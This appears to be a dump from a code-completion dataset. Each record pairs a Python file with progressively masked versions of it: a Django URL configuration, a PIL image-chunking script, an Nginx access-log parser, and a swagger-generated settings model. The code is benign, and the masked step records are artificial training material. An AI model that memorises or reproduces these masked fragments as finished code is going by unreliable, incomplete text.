*self.exc_arg_types),\n JavaOpcodes.ATHROW(),\n )\n",
"step-ids": [
12,
15,
16,
18,
23
]
}
|
[
12,
15,
16,
18,
23
] |
"""URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import include, url
from django.contrib import admin
from django.views.generic import TemplateView
from django.conf.urls.static import static
from django.conf import settings
from .auth.views import account_profile
from .views import member_index, member_action
urlpatterns = [
# Landing page area
url(r'^$', TemplateView.as_view(template_name='visitor/landing-index.html'), name='landing_index'),
url(r'^about$', TemplateView.as_view(template_name='visitor/landing-about.html'), name='landing_about'),
url(r'^terms/$', TemplateView.as_view(template_name='visitor/terms.html'), name='website_terms'),
url(r'^contact$', TemplateView.as_view(template_name='visitor/contact.html'), name='website_contact'),
# Account management is done by allauth
url(r'^accounts/', include('allauth.urls')),
# Account profile and member info done locally
url(r'^accounts/profile/$', account_profile, name='account_profile'),
url(r'^member/$', member_index, name='user_home'),
url(r'^member/action$', member_action, name='user_action'),
# Usual Django admin
url(r'^admin/', admin.site.urls),
] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
|
normal
|
{
"blob_id": "312a95c9514722157653365104d8cd0ada760ce8",
"index": 8084,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = [url('^$', TemplateView.as_view(template_name=\n 'visitor/landing-index.html'), name='landing_index'), url('^about$',\n TemplateView.as_view(template_name='visitor/landing-about.html'), name=\n 'landing_about'), url('^terms/$', TemplateView.as_view(template_name=\n 'visitor/terms.html'), name='website_terms'), url('^contact$',\n TemplateView.as_view(template_name='visitor/contact.html'), name=\n 'website_contact'), url('^accounts/', include('allauth.urls')), url(\n '^accounts/profile/$', account_profile, name='account_profile'), url(\n '^member/$', member_index, name='user_home'), url('^member/action$',\n member_action, name='user_action'), url('^admin/', admin.site.urls)\n ] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n",
"step-3": "<mask token>\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\nfrom django.views.generic import TemplateView\nfrom django.conf.urls.static import static\nfrom django.conf import settings\nfrom .auth.views import account_profile\nfrom .views import member_index, member_action\nurlpatterns = [url('^$', TemplateView.as_view(template_name=\n 'visitor/landing-index.html'), name='landing_index'), url('^about$',\n TemplateView.as_view(template_name='visitor/landing-about.html'), name=\n 'landing_about'), url('^terms/$', TemplateView.as_view(template_name=\n 'visitor/terms.html'), name='website_terms'), url('^contact$',\n TemplateView.as_view(template_name='visitor/contact.html'), name=\n 'website_contact'), url('^accounts/', include('allauth.urls')), url(\n '^accounts/profile/$', account_profile, name='account_profile'), url(\n '^member/$', member_index, name='user_home'), url('^member/action$',\n member_action, name='user_action'), url('^admin/', admin.site.urls)\n ] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n",
"step-4": "\"\"\"URL Configuration\r\n\r\nThe `urlpatterns` list routes URLs to views. For more information please see:\r\n https://docs.djangoproject.com/en/1.10/topics/http/urls/\r\nExamples:\r\nFunction views\r\n 1. Add an import: from my_app import views\r\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\r\nClass-based views\r\n 1. Add an import: from other_app.views import Home\r\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\r\nIncluding another URLconf\r\n 1. Import the include() function: from django.conf.urls import url, include\r\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\r\n\"\"\"\r\nfrom django.conf.urls import include, url\r\nfrom django.contrib import admin\r\nfrom django.views.generic import TemplateView\r\nfrom django.conf.urls.static import static\r\nfrom django.conf import settings\r\n\r\nfrom .auth.views import account_profile\r\nfrom .views import member_index, member_action\r\n\r\nurlpatterns = [\r\n # Landing page area\r\n url(r'^$', TemplateView.as_view(template_name='visitor/landing-index.html'), name='landing_index'),\r\n url(r'^about$', TemplateView.as_view(template_name='visitor/landing-about.html'), name='landing_about'),\r\n url(r'^terms/$', TemplateView.as_view(template_name='visitor/terms.html'), name='website_terms'),\r\n url(r'^contact$', TemplateView.as_view(template_name='visitor/contact.html'), name='website_contact'),\r\n\r\n # Account management is done by allauth\r\n url(r'^accounts/', include('allauth.urls')),\r\n\r\n # Account profile and member info done locally\r\n url(r'^accounts/profile/$', account_profile, name='account_profile'),\r\n url(r'^member/$', member_index, name='user_home'),\r\n url(r'^member/action$', member_action, name='user_action'),\r\n\r\n # Usual Django admin\r\n url(r'^admin/', admin.site.urls),\r\n] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\r\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from PIL import Image
source = Image.open("map4.png")
img = source.load()
map_data = {}
curr_x = 1
curr_y = 1
#Go over each chunk and get the pixel info
for x in range(0, 100, 10):
curr_x = x+1
for y in range(0, 100, 10):
curr_y = y+1
chunk = str(curr_x)+"X"+str(curr_y)
if chunk not in map_data:
map_data[chunk] = {}
for j in range(0, 10):
for k in range(0, 10):
loc = str(curr_x+j)+"x"+str(curr_y+k)
map_data[chunk][loc] = img[x+j, y+k]
#print map_data.keys()
#print map_data["1X1"]
print len(map_data.keys())
print len(map_data["1X1"].keys())
|
normal
|
{
"blob_id": "297b2ff6c6022bd8aac09c25537a132f67e05174",
"index": 525,
"step-1": "from PIL import Image\n\nsource = Image.open(\"map4.png\")\nimg = source.load()\n\nmap_data = {}\n\ncurr_x = 1\ncurr_y = 1\n#Go over each chunk and get the pixel info\nfor x in range(0, 100, 10):\n\tcurr_x = x+1\n\tfor y in range(0, 100, 10):\n\t\tcurr_y = y+1\n\t\tchunk = str(curr_x)+\"X\"+str(curr_y)\n\t\tif chunk not in map_data:\n\t\t\tmap_data[chunk] = {}\n\t\tfor j in range(0, 10):\n\t\t\tfor k in range(0, 10):\n\t\t\t\tloc = str(curr_x+j)+\"x\"+str(curr_y+k)\n\t\t\t\tmap_data[chunk][loc] = img[x+j, y+k]\n#print map_data.keys()\n#print map_data[\"1X1\"]\nprint len(map_data.keys())\nprint len(map_data[\"1X1\"].keys())\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
# -*- coding: utf-8 -*-
# Copyright (c) 2017 Feng Shuo
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
from itertools import islice
from config import RequestInfo
import re
__all__ = ['NginxRequestInfo', ]
class NginxLogParse(object):
"""
Parse Nginx access.log into certain request info
"""
__slots__ = ('_ngx_log', 'ngx_log',)
def __init__(self):
self._ngx_log = '/var/log/nginx/access.log'
@property
def ngx_log(self):
"""
ngx_log filename
:returns: ngx_log filename
:rtype: ``string``
"""
return self._ngx_log
@ngx_log.setter
def ngx_log(self, nginx_log):
"""
set ngx_log
"""
self._ngx_log = nginx_log
def get_ngx_logs(self, line_nums=-1000):
"""
Get nginx logs by line_nums
:param line_nums:
line/row number in nginx log
:type line_nums:
``integer``
:returns:
if line_nums > 0, then get single request message line
if line_nums = 0, get all request messages lines
if line_nums < 0, get latest ${line_nums} request messages lines
:rtype:
``list``
"""
try:
with open(self.ngx_log) as F:
if line_nums > 0:
for line in islice(F, line_nums-1, line_nums):
return [line]
else:
lines = F.readlines()[line_nums:]
return lines
except Exception as e:
print "Failed to get detail log(s) in nginx access.log due to %s" % e
@staticmethod
def ngx_log_to_requestinfo(log=None):
"""
Parse nginx request log(one row/line) into namedtuple instance ``Request_info`` defined in class
:param log:
one nginx request log log in access.log you extracted
:type log:
string
"""
# pat is defined due to default nginx access.log format
pat = (r''
'(\d+.\d+.\d+.\d+)\s-\s-\s'
'\[(.+)\]\s'
'"GET\s(.+)\s\w+/.+"\s'
'(\d+)\s'
'(\d+)\s'
'"(.+)"\s'
'"(.+)"'
)
if log:
request_info = re.findall(pat, log)[0]
if request_info:
request_info = RequestInfo(request_info[0], request_info[1], request_info[2], request_info[3],
request_info[4], request_info[5], request_info[6])
return request_info
# TODO should move to test
# ngx_request_info = NginxLogParse()
# ngx_request_info.ngx_log = '../test.log'
# line = ngx_request_info.get_ngx_logs(100)
# req_info = ngx_request_info.ngx_log_to_requestinfo(line[0])
|
normal
|
{
"blob_id": "a299bd230a25a646060f85cffc8e84c534e2f805",
"index": 8185,
"step-1": "# -*- coding: utf-8 -*-\n# Copyright (c) 2017 Feng Shuo\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n\n\nfrom itertools import islice\nfrom config import RequestInfo\nimport re\n\n__all__ = ['NginxRequestInfo', ]\n\n\nclass NginxLogParse(object):\n \"\"\"\n Parse Nginx access.log into certain request info\n \"\"\"\n\n __slots__ = ('_ngx_log', 'ngx_log',)\n\n def __init__(self):\n self._ngx_log = '/var/log/nginx/access.log'\n\n @property\n def ngx_log(self):\n \"\"\"\n ngx_log filename\n :returns: ngx_log filename\n :rtype: ``string``\n \"\"\"\n return self._ngx_log\n\n @ngx_log.setter\n def ngx_log(self, nginx_log):\n \"\"\"\n set ngx_log\n \"\"\"\n self._ngx_log = nginx_log\n\n def get_ngx_logs(self, line_nums=-1000):\n \"\"\"\n Get nginx logs by line_nums\n :param line_nums:\n line/row number in nginx log\n :type line_nums:\n ``integer``\n :returns:\n if line_nums > 0, then get single request message line\n if line_nums = 0, get all request messages lines\n if line_nums < 0, get latest ${line_nums} request messages lines\n :rtype:\n ``list``\n \"\"\"\n try:\n with open(self.ngx_log) as F:\n if line_nums > 0:\n for line in islice(F, line_nums-1, line_nums):\n return [line]\n else:\n lines = F.readlines()[line_nums:]\n return lines\n except Exception as e:\n print \"Failed to get detail log(s) in nginx access.log due to %s\" % e\n\n @staticmethod\n def ngx_log_to_requestinfo(log=None):\n \"\"\"\n Parse nginx request log(one row/line) into namedtuple instance ``Request_info`` defined in class\n :param log:\n one nginx request log log in access.log you extracted\n :type log:\n string\n \"\"\"\n # pat is defined due to default nginx access.log format\n pat = (r''\n '(\\d+.\\d+.\\d+.\\d+)\\s-\\s-\\s'\n '\\[(.+)\\]\\s'\n '\"GET\\s(.+)\\s\\w+/.+\"\\s'\n '(\\d+)\\s'\n '(\\d+)\\s'\n '\"(.+)\"\\s'\n '\"(.+)\"'\n )\n if log:\n request_info = re.findall(pat, log)[0]\n if request_info:\n request_info = RequestInfo(request_info[0], request_info[1], request_info[2], request_info[3],\n request_info[4], request_info[5], request_info[6])\n return request_info\n\n\n# TODO should move to test\n# ngx_request_info = NginxLogParse()\n# ngx_request_info.ngx_log = '../test.log'\n# line = ngx_request_info.get_ngx_logs(100)\n# req_info = ngx_request_info.ngx_log_to_requestinfo(line[0])\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
class RawDataSettingsV1(object):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __init__(self, data_aggregation_setting=None, raw_data_setting=None,
units_setting=None, work_hours_setting=None):
"""RawDataSettingsV1 - a model defined in Swagger"""
self._data_aggregation_setting = None
self._raw_data_setting = None
self._units_setting = None
self._work_hours_setting = None
self.discriminator = None
if data_aggregation_setting is not None:
self.data_aggregation_setting = data_aggregation_setting
if raw_data_setting is not None:
self.raw_data_setting = raw_data_setting
if units_setting is not None:
self.units_setting = units_setting
if work_hours_setting is not None:
self.work_hours_setting = work_hours_setting
<|reserved_special_token_0|>
<|reserved_special_token_0|>
@property
def raw_data_setting(self):
"""Gets the raw_data_setting of this RawDataSettingsV1. # noqa: E501
:return: The raw_data_setting of this RawDataSettingsV1. # noqa: E501
:rtype: RawDataSettingV1
"""
return self._raw_data_setting
<|reserved_special_token_0|>
@property
def units_setting(self):
"""Gets the units_setting of this RawDataSettingsV1. # noqa: E501
:return: The units_setting of this RawDataSettingsV1. # noqa: E501
:rtype: UnitsSetting
"""
return self._units_setting
@units_setting.setter
def units_setting(self, units_setting):
"""Sets the units_setting of this RawDataSettingsV1.
:param units_setting: The units_setting of this RawDataSettingsV1. # noqa: E501
:type: UnitsSetting
"""
self._units_setting = units_setting
@property
def work_hours_setting(self):
"""Gets the work_hours_setting of this RawDataSettingsV1. # noqa: E501
:return: The work_hours_setting of this RawDataSettingsV1. # noqa: E501
:rtype: WorkHoursSetting
"""
return self._work_hours_setting
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, RawDataSettingsV1):
return False
return self.__dict__ == other.__dict__
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class RawDataSettingsV1(object):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __init__(self, data_aggregation_setting=None, raw_data_setting=None,
units_setting=None, work_hours_setting=None):
"""RawDataSettingsV1 - a model defined in Swagger"""
self._data_aggregation_setting = None
self._raw_data_setting = None
self._units_setting = None
self._work_hours_setting = None
self.discriminator = None
if data_aggregation_setting is not None:
self.data_aggregation_setting = data_aggregation_setting
if raw_data_setting is not None:
self.raw_data_setting = raw_data_setting
if units_setting is not None:
self.units_setting = units_setting
if work_hours_setting is not None:
self.work_hours_setting = work_hours_setting
@property
def data_aggregation_setting(self):
"""Gets the data_aggregation_setting of this RawDataSettingsV1. # noqa: E501
:return: The data_aggregation_setting of this RawDataSettingsV1. # noqa: E501
:rtype: DataAggregationSetting
"""
return self._data_aggregation_setting
@data_aggregation_setting.setter
def data_aggregation_setting(self, data_aggregation_setting):
"""Sets the data_aggregation_setting of this RawDataSettingsV1.
:param data_aggregation_setting: The data_aggregation_setting of this RawDataSettingsV1. # noqa: E501
:type: DataAggregationSetting
"""
self._data_aggregation_setting = data_aggregation_setting
@property
def raw_data_setting(self):
"""Gets the raw_data_setting of this RawDataSettingsV1. # noqa: E501
:return: The raw_data_setting of this RawDataSettingsV1. # noqa: E501
:rtype: RawDataSettingV1
"""
return self._raw_data_setting
@raw_data_setting.setter
def raw_data_setting(self, raw_data_setting):
"""Sets the raw_data_setting of this RawDataSettingsV1.
:param raw_data_setting: The raw_data_setting of this RawDataSettingsV1. # noqa: E501
:type: RawDataSettingV1
"""
self._raw_data_setting = raw_data_setting
@property
def units_setting(self):
"""Gets the units_setting of this RawDataSettingsV1. # noqa: E501
:return: The units_setting of this RawDataSettingsV1. # noqa: E501
:rtype: UnitsSetting
"""
return self._units_setting
@units_setting.setter
def units_setting(self, units_setting):
"""Sets the units_setting of this RawDataSettingsV1.
:param units_setting: The units_setting of this RawDataSettingsV1. # noqa: E501
:type: UnitsSetting
"""
self._units_setting = units_setting
@property
def work_hours_setting(self):
"""Gets the work_hours_setting of this RawDataSettingsV1. # noqa: E501
:return: The work_hours_setting of this RawDataSettingsV1. # noqa: E501
:rtype: WorkHoursSetting
"""
return self._work_hours_setting
@work_hours_setting.setter
def work_hours_setting(self, work_hours_setting):
"""Sets the work_hours_setting of this RawDataSettingsV1.
:param work_hours_setting: The work_hours_setting of this RawDataSettingsV1. # noqa: E501
:type: WorkHoursSetting
"""
self._work_hours_setting = work_hours_setting
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(lambda x: x.to_dict() if hasattr(x,
'to_dict') else x, value))
elif hasattr(value, 'to_dict'):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(lambda item: (item[0], item[1].
to_dict()) if hasattr(item[1], 'to_dict') else item,
value.items()))
else:
result[attr] = value
if issubclass(RawDataSettingsV1, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, RawDataSettingsV1):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class RawDataSettingsV1(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {'data_aggregation_setting': 'DataAggregationSetting',
'raw_data_setting': 'RawDataSettingV1', 'units_setting':
'UnitsSetting', 'work_hours_setting': 'WorkHoursSetting'}
attribute_map = {'data_aggregation_setting': 'dataAggregationSetting',
'raw_data_setting': 'rawDataSetting', 'units_setting':
'unitsSetting', 'work_hours_setting': 'workHoursSetting'}
def __init__(self, data_aggregation_setting=None, raw_data_setting=None,
units_setting=None, work_hours_setting=None):
"""RawDataSettingsV1 - a model defined in Swagger"""
self._data_aggregation_setting = None
self._raw_data_setting = None
self._units_setting = None
self._work_hours_setting = None
self.discriminator = None
if data_aggregation_setting is not None:
self.data_aggregation_setting = data_aggregation_setting
if raw_data_setting is not None:
self.raw_data_setting = raw_data_setting
if units_setting is not None:
self.units_setting = units_setting
if work_hours_setting is not None:
self.work_hours_setting = work_hours_setting
@property
def data_aggregation_setting(self):
"""Gets the data_aggregation_setting of this RawDataSettingsV1. # noqa: E501
:return: The data_aggregation_setting of this RawDataSettingsV1. # noqa: E501
:rtype: DataAggregationSetting
"""
return self._data_aggregation_setting
@data_aggregation_setting.setter
def data_aggregation_setting(self, data_aggregation_setting):
"""Sets the data_aggregation_setting of this RawDataSettingsV1.
:param data_aggregation_setting: The data_aggregation_setting of this RawDataSettingsV1. # noqa: E501
:type: DataAggregationSetting
"""
self._data_aggregation_setting = data_aggregation_setting
@property
def raw_data_setting(self):
"""Gets the raw_data_setting of this RawDataSettingsV1. # noqa: E501
:return: The raw_data_setting of this RawDataSettingsV1. # noqa: E501
:rtype: RawDataSettingV1
"""
return self._raw_data_setting
@raw_data_setting.setter
def raw_data_setting(self, raw_data_setting):
"""Sets the raw_data_setting of this RawDataSettingsV1.
:param raw_data_setting: The raw_data_setting of this RawDataSettingsV1. # noqa: E501
:type: RawDataSettingV1
"""
self._raw_data_setting = raw_data_setting
@property
def units_setting(self):
"""Gets the units_setting of this RawDataSettingsV1. # noqa: E501
:return: The units_setting of this RawDataSettingsV1. # noqa: E501
:rtype: UnitsSetting
"""
return self._units_setting
@units_setting.setter
def units_setting(self, units_setting):
"""Sets the units_setting of this RawDataSettingsV1.
:param units_setting: The units_setting of this RawDataSettingsV1. # noqa: E501
:type: UnitsSetting
"""
self._units_setting = units_setting
@property
def work_hours_setting(self):
"""Gets the work_hours_setting of this RawDataSettingsV1. # noqa: E501
:return: The work_hours_setting of this RawDataSettingsV1. # noqa: E501
:rtype: WorkHoursSetting
"""
return self._work_hours_setting
@work_hours_setting.setter
def work_hours_setting(self, work_hours_setting):
"""Sets the work_hours_setting of this RawDataSettingsV1.
:param work_hours_setting: The work_hours_setting of this RawDataSettingsV1. # noqa: E501
:type: WorkHoursSetting
"""
self._work_hours_setting = work_hours_setting
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(lambda x: x.to_dict() if hasattr(x,
'to_dict') else x, value))
elif hasattr(value, 'to_dict'):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(lambda item: (item[0], item[1].
to_dict()) if hasattr(item[1], 'to_dict') else item,
value.items()))
else:
result[attr] = value
if issubclass(RawDataSettingsV1, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, RawDataSettingsV1):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import pprint
import re
import six
from swagger_client.models.data_aggregation_setting import DataAggregationSetting
from swagger_client.models.raw_data_setting_v1 import RawDataSettingV1
from swagger_client.models.units_setting import UnitsSetting
from swagger_client.models.work_hours_setting import WorkHoursSetting
class RawDataSettingsV1(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {'data_aggregation_setting': 'DataAggregationSetting',
'raw_data_setting': 'RawDataSettingV1', 'units_setting':
'UnitsSetting', 'work_hours_setting': 'WorkHoursSetting'}
attribute_map = {'data_aggregation_setting': 'dataAggregationSetting',
'raw_data_setting': 'rawDataSetting', 'units_setting':
'unitsSetting', 'work_hours_setting': 'workHoursSetting'}
def __init__(self, data_aggregation_setting=None, raw_data_setting=None,
units_setting=None, work_hours_setting=None):
"""RawDataSettingsV1 - a model defined in Swagger"""
self._data_aggregation_setting = None
self._raw_data_setting = None
self._units_setting = None
self._work_hours_setting = None
self.discriminator = None
if data_aggregation_setting is not None:
self.data_aggregation_setting = data_aggregation_setting
if raw_data_setting is not None:
self.raw_data_setting = raw_data_setting
if units_setting is not None:
self.units_setting = units_setting
if work_hours_setting is not None:
self.work_hours_setting = work_hours_setting
@property
def data_aggregation_setting(self):
"""Gets the data_aggregation_setting of this RawDataSettingsV1. # noqa: E501
:return: The data_aggregation_setting of this RawDataSettingsV1. # noqa: E501
:rtype: DataAggregationSetting
"""
return self._data_aggregation_setting
@data_aggregation_setting.setter
def data_aggregation_setting(self, data_aggregation_setting):
"""Sets the data_aggregation_setting of this RawDataSettingsV1.
:param data_aggregation_setting: The data_aggregation_setting of this RawDataSettingsV1. # noqa: E501
:type: DataAggregationSetting
"""
self._data_aggregation_setting = data_aggregation_setting
@property
def raw_data_setting(self):
"""Gets the raw_data_setting of this RawDataSettingsV1. # noqa: E501
:return: The raw_data_setting of this RawDataSettingsV1. # noqa: E501
:rtype: RawDataSettingV1
"""
return self._raw_data_setting
@raw_data_setting.setter
def raw_data_setting(self, raw_data_setting):
"""Sets the raw_data_setting of this RawDataSettingsV1.
:param raw_data_setting: The raw_data_setting of this RawDataSettingsV1. # noqa: E501
:type: RawDataSettingV1
"""
self._raw_data_setting = raw_data_setting
@property
def units_setting(self):
"""Gets the units_setting of this RawDataSettingsV1. # noqa: E501
:return: The units_setting of this RawDataSettingsV1. # noqa: E501
:rtype: UnitsSetting
"""
return self._units_setting
@units_setting.setter
def units_setting(self, units_setting):
"""Sets the units_setting of this RawDataSettingsV1.
:param units_setting: The units_setting of this RawDataSettingsV1. # noqa: E501
:type: UnitsSetting
"""
self._units_setting = units_setting
@property
def work_hours_setting(self):
"""Gets the work_hours_setting of this RawDataSettingsV1. # noqa: E501
:return: The work_hours_setting of this RawDataSettingsV1. # noqa: E501
:rtype: WorkHoursSetting
"""
return self._work_hours_setting
@work_hours_setting.setter
def work_hours_setting(self, work_hours_setting):
"""Sets the work_hours_setting of this RawDataSettingsV1.
:param work_hours_setting: The work_hours_setting of this RawDataSettingsV1. # noqa: E501
:type: WorkHoursSetting
"""
self._work_hours_setting = work_hours_setting
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(lambda x: x.to_dict() if hasattr(x,
'to_dict') else x, value))
elif hasattr(value, 'to_dict'):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(lambda item: (item[0], item[1].
to_dict()) if hasattr(item[1], 'to_dict') else item,
value.items()))
else:
result[attr] = value
if issubclass(RawDataSettingsV1, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, RawDataSettingsV1):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
<|reserved_special_token_1|>
# coding: utf-8
"""
SevOne API Documentation
Supported endpoints by the new RESTful API # noqa: E501
OpenAPI spec version: 2.1.18, Hash: db562e6
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from swagger_client.models.data_aggregation_setting import DataAggregationSetting # noqa: F401,E501
from swagger_client.models.raw_data_setting_v1 import RawDataSettingV1 # noqa: F401,E501
from swagger_client.models.units_setting import UnitsSetting # noqa: F401,E501
from swagger_client.models.work_hours_setting import WorkHoursSetting # noqa: F401,E501
class RawDataSettingsV1(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'data_aggregation_setting': 'DataAggregationSetting',
'raw_data_setting': 'RawDataSettingV1',
'units_setting': 'UnitsSetting',
'work_hours_setting': 'WorkHoursSetting'
}
attribute_map = {
'data_aggregation_setting': 'dataAggregationSetting',
'raw_data_setting': 'rawDataSetting',
'units_setting': 'unitsSetting',
'work_hours_setting': 'workHoursSetting'
}
def __init__(self, data_aggregation_setting=None, raw_data_setting=None, units_setting=None, work_hours_setting=None): # noqa: E501
"""RawDataSettingsV1 - a model defined in Swagger""" # noqa: E501
self._data_aggregation_setting = None
self._raw_data_setting = None
self._units_setting = None
self._work_hours_setting = None
self.discriminator = None
if data_aggregation_setting is not None:
self.data_aggregation_setting = data_aggregation_setting
if raw_data_setting is not None:
self.raw_data_setting = raw_data_setting
if units_setting is not None:
self.units_setting = units_setting
if work_hours_setting is not None:
self.work_hours_setting = work_hours_setting
@property
def data_aggregation_setting(self):
"""Gets the data_aggregation_setting of this RawDataSettingsV1. # noqa: E501
:return: The data_aggregation_setting of this RawDataSettingsV1. # noqa: E501
:rtype: DataAggregationSetting
"""
return self._data_aggregation_setting
@data_aggregation_setting.setter
def data_aggregation_setting(self, data_aggregation_setting):
"""Sets the data_aggregation_setting of this RawDataSettingsV1.
:param data_aggregation_setting: The data_aggregation_setting of this RawDataSettingsV1. # noqa: E501
:type: DataAggregationSetting
"""
self._data_aggregation_setting = data_aggregation_setting
@property
def raw_data_setting(self):
"""Gets the raw_data_setting of this RawDataSettingsV1. # noqa: E501
:return: The raw_data_setting of this RawDataSettingsV1. # noqa: E501
:rtype: RawDataSettingV1
"""
return self._raw_data_setting
@raw_data_setting.setter
def raw_data_setting(self, raw_data_setting):
"""Sets the raw_data_setting of this RawDataSettingsV1.
:param raw_data_setting: The raw_data_setting of this RawDataSettingsV1. # noqa: E501
:type: RawDataSettingV1
"""
self._raw_data_setting = raw_data_setting
@property
def units_setting(self):
"""Gets the units_setting of this RawDataSettingsV1. # noqa: E501
:return: The units_setting of this RawDataSettingsV1. # noqa: E501
:rtype: UnitsSetting
"""
return self._units_setting
@units_setting.setter
def units_setting(self, units_setting):
"""Sets the units_setting of this RawDataSettingsV1.
:param units_setting: The units_setting of this RawDataSettingsV1. # noqa: E501
:type: UnitsSetting
"""
self._units_setting = units_setting
@property
def work_hours_setting(self):
"""Gets the work_hours_setting of this RawDataSettingsV1. # noqa: E501
:return: The work_hours_setting of this RawDataSettingsV1. # noqa: E501
:rtype: WorkHoursSetting
"""
return self._work_hours_setting
@work_hours_setting.setter
def work_hours_setting(self, work_hours_setting):
"""Sets the work_hours_setting of this RawDataSettingsV1.
:param work_hours_setting: The work_hours_setting of this RawDataSettingsV1. # noqa: E501
:type: WorkHoursSetting
"""
self._work_hours_setting = work_hours_setting
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(RawDataSettingsV1, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, RawDataSettingsV1):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
flexible
|
{
"blob_id": "25d4fa44cb17048301076391d5d67ae0b0812ac7",
"index": 3988,
